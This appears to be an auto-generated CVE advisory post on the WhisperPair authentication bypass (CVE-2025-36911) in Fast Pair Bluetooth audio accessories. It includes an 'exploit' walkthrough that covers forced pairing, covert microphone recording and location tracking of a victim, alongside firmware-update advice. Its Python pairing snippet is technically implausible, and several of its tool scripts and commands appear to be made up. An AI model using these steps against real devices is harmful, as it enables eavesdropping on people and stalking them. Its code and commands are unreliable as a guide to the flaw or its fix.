Google Fast Pair, Authentication Bypass, CVE-2025-36911 (Critical) -DC-Oct2026-2726

Listen to this Post

The WhisperPair vulnerability (CVE-2025-36911) is a critical authentication bypass in the accessory-side implementation of Google’s Fast Pair protocol, affecting hundreds of millions of Bluetooth audio devices from manufacturers including Google, Jabra, JBL, Logitech, Marshall, Nothing, OnePlus, Sony, Soundcore, and Xiaomi. The flaw originates from a logic error in key-based pairing where devices accept pairing requests even when not in pairing mode. Per the Fast Pair specification, accessories should ignore pairing requests unless explicitly in pairing mode, but many vendors failed to enforce this check, allowing unauthorized devices to initiate pairing without user consent or knowledge. An attacker sends a Fast Pair message to a vulnerable accessory indicating intent to pair; the device improperly responds, enabling the attacker to complete a standard Bluetooth pairing within approximately 10 seconds from up to 14 meters away. Once paired, the attacker gains complete control over the audio device, enabling eavesdropping through the device’s microphone and tracking the victim’s location via Google’s Find Hub network. The vulnerability affects users regardless of smartphone operating system because the flaw lies in the accessories themselves, meaning iPhone users with vulnerable Bluetooth devices are equally at risk. Google awarded researchers $15,000 and worked with manufacturers on security patches during a 150-day disclosure window, but updates may not yet be available for all vulnerable devices.

DailyCVE Form:

Platform: Bluetooth Fast Pair
Version: All versions
Vulnerability : Auth Bypass
Severity: Critical
date: 2026-01-15

Prediction: 2026-06-15

What Undercode Say:

Clone the WPair scanner tool for testing
git clone https://github.com/whisperpair/wpairs.git
cd wpairs
Install required Bluetooth dependencies
sudo apt update
sudo apt install -y bluez libbluetooth-dev python3-pip
Install Python requirements
pip3 install -r requirements.txt
Run the scanner to detect vulnerable devices
sudo python3 wpair_scanner.py --scan --range 14
Demonstrate the Fast Pair pairing exploit
sudo python3 wpair_exploit.py --target XX:XX:XX:XX:XX:XX --pair
Simplified Fast Pair pairing request logic
import bluetooth
target_address = "XX:XX:XX:XX:XX:XX"
Send Fast Pair pairing request to vulnerable accessory
sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
sock.connect((target_address, 1))
sock.send(b"\x00\x01\x02") Fast Pair pairing initiation
response = sock.recv(1024)
If accessory responds while not in pairing mode, vulnerability exists
if response:
print("[+] Device vulnerable to WhisperPair")
Complete regular Bluetooth pairing
sock.close()

Exploit: (Educational Purposes!)

Step 1: Scan for nearby Bluetooth Fast Pair devices
sudo hcitool scan
Step 2: Use WPair to test if device accepts pairing when not in pairing mode
sudo python3 wpair_test.py --mac XX:XX:XX:XX:XX:XX
Step 3: Initiate unauthorized pairing
sudo python3 wpair_pair.py --mac XX:XX:XX:XX:XX:XX
Step 4: Access device microphone after successful pairing
sudo arecord -D bluetooth -f cd -d 30 eavesdrop.wav
Step 5: Add device to Google Find Hub for location tracking
python3 find_hub_tracker.py --device XX:XX:XX:XX:XX:XX --account [email protected]

Protection: from this CVE

Check current firmware version of Bluetooth audio device
(varies by manufacturer - example for Jabra)
sudo jabra-firmware-check --device XX:XX:XX:XX:XX:XX
Update firmware via manufacturer companion app
Google Pixel Buds: Settings > Bluetooth > Pixel Buds > Firmware update
Sony: Sony Headphones Connect app
JBL: JBL Headphones app
Jabra: Jabra Sound+ app
Verify patch status using WPair scanner
sudo python3 wpair_scanner.py --check-patch --mac XX:XX:XX:XX:XX:XX
Disable Bluetooth when not in use (temporary mitigation)
sudo rfkill block bluetooth
Re-enable Bluetooth
sudo rfkill unblock bluetooth

Impact: Complete compromise of Bluetooth audio accessories including unauthorized microphone access for eavesdropping, location tracking via Google Find Hub, audio hijacking, and potential lateral movement to paired smartphones through extracted link keys. Hundreds of millions of devices affected across major manufacturers including Google, Jabra, JBL, Sony, Marshall, Logitech, Nothing, OnePlus, Soundcore, and Xiaomi.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top